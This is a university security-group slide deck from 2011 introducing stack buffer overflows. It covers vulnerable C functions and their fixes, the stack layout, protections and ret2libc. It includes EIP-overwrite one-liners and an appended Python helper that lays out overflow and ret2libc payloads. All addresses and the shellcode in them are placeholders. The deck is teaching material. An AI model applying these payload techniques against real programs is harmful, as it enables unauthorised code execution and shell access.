Intro to Exploitation: Stack Overflows
James McFadyen
UTD Computer Security Group
10/20/2011

Intro to Exploitation
- Only an intro to stack overflows
- Basic theory and application
- One of many types of exploitation

Outline
- What is a buffer overflow?
- Tools
- Vulnerable C Functions
- Remember the memory
- Learn to love assembly
- Stack overflow
- Protection Mechanisms
- ret2libc in Linux

Buffer Overflow
"In computer security and programming, a buffer overflow, or buffer overrun, is an anomaly where a program, while writing data to a buffer, overruns the buffer's boundary and overwrites adjacent memory. This is a special case of violation of memory safety." (Wikipedia)

Buffer Overflow
In our examples:
- Give the program too much input, hijack the instruction pointer (EIP)
- Control EIP
- Execute arbitrary code locally or remotely
- Achieve what we want as an elevated user

Tools
- Linux: GDB, gcc, vi, perl/python/ruby, readelf, objdump, ltrace, strace, ropeme
- Windows: WinDBG, OllyDBG, ImmunityDBG, IDA, Python, Mona (ImmunityDBG plugin)

Vulnerable C Code
- strcpy(), strncpy()
- strcat(), strncat()
- sprintf(), snprintf()
- gets()
- sscanf()
- Many others...

Vulnerable C Code
strcpy() doesn't check size. If we have
    char buf[128];
    strcpy(buf, userSuppliedString);
This makes it too easy...

Vulnerable C Code
    char *strncpy(char *dest, const char *src, size_t n);
We have a size, but what if..
    strncpy(somebuffer, str, strlen(str));          /* bound comes from the input, not the buffer */
or..
    strncpy(somebuffer, str, sizeof(somebuffer));   /* no room left for the terminating '\0' */
where str is supplied by the user?

Vulnerable C Code
Common bug, proper fix:
    strncpy(somebuffer, str, sizeof(somebuffer)-1);
    somebuffer[sizeof(somebuffer)-1] = '\0';
strncpy() does not write a terminator when str is at least n bytes long, so terminate explicitly.

Vulnerable C Code
    char *strncat(char *dest, const char *src, size_t n);
Ex:
    int vulnerable(char *str1, char *str2)
    {
        char buf[256];
        strncpy(buf, str1, 100);
        strncat(buf, str2, sizeof(buf)-1);   /* n is the number of bytes to append, not the size of buf */
        return 0;
    }

Vulnerable C Code
Fix:
    strncat(buf, str2, sizeof(buf) - strlen(buf) - 1);

Remember the Memory
Segments, from low to high addresses: Text, Data, BSS, Heap, Stack
- Text: code segment, machine instructions
- Data: initialized global and static variables
- BSS: uninitialized global and static variables
- Heap: dynamic space. malloc(...) / free(...), new(...) / ~
- Stack: program scratch space. Local variables, passed arguments, etc.
* Taken from Mitchell Adair's "Stack Overflows"

Remember the Memory: The Stack
    Low addresses
      ESP ->  local variables ...      (EBP - x)
      EBP ->  EBP (saved)
              RET
              arguments ...            (EBP + x)
              previous stack frame
    High addresses

Love the Assembly
    EIP   Extended Instruction Pointer   Next instruction executed
    ESP   Extended Stack Pointer         Top of stack
    EBP   Extended Base Pointer          Base pointer
    EAX   Accumulator register
    EBX   Base register
    ECX   Counter register
    EDX   Data register
    ESI   Source index
    EDI   Destination index

Stack Overflow
      ESP ->  char buf[100]   100 bytes
      EBP ->  EBP             4 bytes
              RET             4 bytes
              argc
              *argv[]

Stack Overflow
Ex (the one-liners in these slides use Python 2 print syntax):
    $ ./program $(python -c 'print "A" * 108')
- 108 bytes (0x41 * 108): 100 fill buf, 4 overwrite the saved EBP, 4 overwrite RET
- ret will pop the instruction pointer off of the stack
- EIP will now point to 0x41414141
      ESP ->  buf             100 bytes   (filled with 0x41)
      EBP ->  EBP             4 bytes     (overwritten)
              RET             4 bytes     (overwritten)
              argc
              *argv[]

Stack Overflow
Ex:
    $ ./program $(python -c 'print "A" * 104 + "\xef\xbe\xad\xde"')
- 104 bytes (0x41 * 104) reach up to RET; the next 4 bytes replace it
- The address is written byte-reversed because x86 is little-endian
- EIP will now point to 0xdeadbeef
- We can now point EIP where we want
      ESP ->  buf             100 bytes   (filled with 0x41)
      EBP ->  EBP             4 bytes     (overwritten)
              RET             4 bytes     (0xdeadbeef)
              argc
              *argv[]

Stack Overflow
    $ ./program $(python -c 'print "A" * 104 + "\xef\xbe\xad\xde"')
- We have 104 bytes for a payload
- The payload can be anything, but for our purpose we would spawn a shell
- The payload has a fixed size, so when we insert it, we must reduce the number of A's by the size of the payload

Stack Overflow
    $ ./program $(python -c 'print "A" * 104 + "\xef\xbe\xad\xde"')
If we had a 32-byte payload...
(a real payload will not be a bunch of \xff)
    $ ./program $(python -c 'print "A" * 72 + "\xff" * 32 + "\xef\xbe\xad\xde"')
- We have adjusted the buffer so the payload will fit (72 + 32 = 104)
- We will then have to point EIP (\xef\xbe\xad\xde) to our payload on the stack

Stack Overflow
    $ ./program $(python -c 'print "A" * 72 + "\xff" * 32 + "\xef\xbe\xad\xde"')
- "\xef\xbe\xad\xde" would be replaced with the address of our payload
- EIP will now point to the address of our payload, which will spawn a shell
- NOPs help create a bigger "landing area"
- This technique is not very effective anymore... why?

Protection Mechanisms (Windows)
- DEP (Data Execution Prevention): can't execute on the stack
- /GS flag: cookie / canary, detects if the stack has been altered
- SafeSEH (Structured Exception Handler): try / except, catches exceptions
- ASLR (Address Space Layout Randomization): randomizes addresses in memory

Protection Mechanisms (Linux)
- NX (No eXecute): processor feature; like DEP, can't execute on the stack
- Stack Smashing Protection: cookie / canary; generally enabled by default
- ASLR (Address Space Layout Randomization)
- Many other compiler protections...

ret2libc
- Bypasses NX
- Point EIP to a function in libc: system(), exec(), etc.
- system("/bin/sh");
- We will get a shell by using the system() function in libc

ret2libc
    $ ./program $(python -c 'print "A" * 104 + "\xef\xbe\xad\xde"')
- We don't need the payload where the A's are anymore
- We now point EIP to the address of system(); the next 4 bytes are the return address that system() will return to, followed by the argument to system() (the address of a "/bin/sh" string)
    $ ./program $(python -c 'print "A" * 104 + address_of_system + return_address + payload')

Demo!
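The byte layouts from the Stack Overflow and ret2libc slides can be sketched in a few lines of Python. This is only an illustration under stated assumptions: the helper names (p32, overflow_payload, ret2libc_payload) are hypothetical, every address is a placeholder such as the slides' 0xdeadbeef, and the 104-byte offset is the one for the example program with char buf[100]. It uses Python 3 bytes, whereas the one-liners on the slides use Python 2 print.

```python
import struct

# Distance from the start of buf to the saved return address in the
# slides' example: 100-byte buffer + 4-byte saved EBP.
BUF_TO_RET = 104


def p32(addr):
    """Pack a 32-bit address in little-endian byte order, as x86 stores it."""
    return struct.pack("<I", addr)


def overflow_payload(ret_addr, shellcode=b""):
    """Filler A's, then the shellcode, then the value that overwrites RET."""
    if len(shellcode) > BUF_TO_RET:
        raise ValueError("shellcode does not fit before RET")
    filler = b"A" * (BUF_TO_RET - len(shellcode))
    return filler + shellcode + p32(ret_addr)


def ret2libc_payload(system_addr, return_addr, binsh_addr):
    """Filler, address of system(), its return address, then its argument."""
    return (b"A" * BUF_TO_RET
            + p32(system_addr)
            + p32(return_addr)
            + p32(binsh_addr))


if __name__ == "__main__":
    # Placeholder values only: 32 bytes of 0xff stand in for a payload,
    # and 0xdeadbeef is the dummy address used on the slides.
    demo = overflow_payload(0xdeadbeef, shellcode=b"\xff" * 32)
    print(len(demo), demo[-4:].hex())
```

Keeping the offset in one constant makes the arithmetic from the slides explicit: the filler shrinks by exactly the size of the payload, so the overwritten RET always lands at byte 104. Real addresses for system() and a "/bin/sh" string would have to be found in a debugger for the specific binary.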
Demo topics:
- How to use GDB for exploitation
- Exploring the stack
- Finding important memory addresses (ret2libc)
- Breakpoints
- Using Perl/Python/Ruby for arguments in GDB
- Basic Stack Overflow
- Ret2libc

Additional Resources
- https://www.corelan.be/index.php/articles/
- http://beej.us/guide/bggdb/
- http://en.wikibooks.org/wiki/X86_Assembly
- http://www.alexonlinux.com/how-debugger-works
- http://smashthestack.org/
- http://intruded.net/

Sources
- "Source Code Auditing" - Jared Demott
- "Smashing the stack in 2010" - Andrea Cugliari + Mariano Graziano
- "Stack Overflows" - Mitchell Adair
- http://en.wikipedia.org/wiki/Buffer_overflow
- http://en.wikipedia.org/wiki/Return-to-libc_attack